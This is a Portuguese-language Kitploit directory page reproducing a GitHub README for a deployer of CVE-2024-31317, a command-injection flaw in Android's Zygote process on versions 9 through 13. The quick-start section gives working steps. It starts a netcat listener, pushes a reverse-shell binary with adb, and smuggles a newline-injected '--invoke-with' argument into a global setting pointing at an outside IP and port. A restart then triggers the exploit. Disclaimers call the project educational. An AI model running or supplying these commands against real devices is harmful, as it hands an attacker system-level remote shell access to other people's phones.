Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-31317-Deployer — Ferramenta de implantação automatizada para CVE-2024-31317, uma vulnerabilidade de injeção de comando no Android 9-13. Inclui payload de shell reverso, script de compilação e análise técnica para pesquisa e educação em segurança. | Kitploit
Ferramentas/GitHubGitHub/kalibb/cve-2024-31317-deployer
Segurança AndroidAnálise de VulnerabilidadesExploraçãoSegurança MóvelComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de Binários

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
kalibb/cve-2024-31317-deployer

CVE-2024-31317-Deployer

Ferramenta de implantação automatizada para CVE-2024-31317, uma vulnerabilidade de injeção de comando no Android 9-13. Inclui payload de shell reverso, script de compilação e análise técnica para pesquisa e educação em segurança.

Ver Repositório
12há 7 mesesAinda não revisado

CVE-2024-31317 Deployer

License Android Status

🔒 Declaração de Pesquisa de Segurança

Este projeto é destinado apenas para fins educacionais e de pesquisa em segurança. Usar esta ferramenta para testes não autorizados é ilegal. O autor não se responsabiliza por qualquer uso indevido ou dano.

📋 Visão Geral

O CVE-2024-31317 é uma vulnerabilidade grave de segurança que afeta dispositivos Android 9 a 13, permitindo que aplicações com a permissão WRITE_SECURE_SETTINGS obtenham execução em nível de sistema por meio de injeção de comandos.

Este projeto fornece uma análise técnica detalhada da vulnerabilidade, código de prova de conceito e ferramentas de implantação automatizada.

✨ Principais Características

  • 📱 Suporte completo para Android 9-13
  • 🛠️ Scripts de implantação automatizada
  • 🔄 Conexão reversa de shell
  • 📊 Documentação técnica detalhada
  • 🎯 Design modular

🐛 Detalhes da Vulnerabilidade

  • CVE ID: CVE-2024-31317
  • Tipo de Vulnerabilidade: Injeção de comando
  • Severidade: Alta (High)
  • Pontuação CVSS: 7.8
  • Componente Afetado: Processo Zygote do Android
  • Estado de Correção: Corrigido no patch de segurança de junho de 2024 do Android

🎯 Escopo de Impacto

Versões Afetadas

  • ✅ Android 9-13

Versões Não Afetadas

  • ❌ Android 14+ (corrigido)
  • ❌ Dispositivos com patch de segurança de junho de 2024 ou superior

📁 Estrutura do Projeto

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Início Rápido

1. Clonar o projeto

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Compilar o Payload

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Implantar

root@kitploit:~
# Iniciar ouvinte
nc -lvnp 4444

# Transferir e executar
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# Injetar payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# Disparar vulnerabilidade
adb shell stop && adb shell start

📚 Documentação

  • Análise Técnica Aprofundada
  • Instruções de Uso do Payload
  • Tutorial Completo

⚠️ Aviso Legal

Este projeto é destinado apenas para fins educacionais e de pesquisa em segurança. Ao usar esta ferramenta, você concorda em:

  • Cumprir todas as leis e regulamentos aplicáveis
  • Utilizar apenas para pesquisa de segurança legítima
  • Ser totalmente responsável por suas ações

📜 Licença

Este projeto é licenciado sob a licença MIT - consulte o arquivo LICENSE para detalhes.

👨‍💻 Autor

fcy10012 - GitHub

🙏 Agradecimentos

Projeto de referência: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ Se este projeto foi útil para você, dê uma estrela!

Baixar ferramenta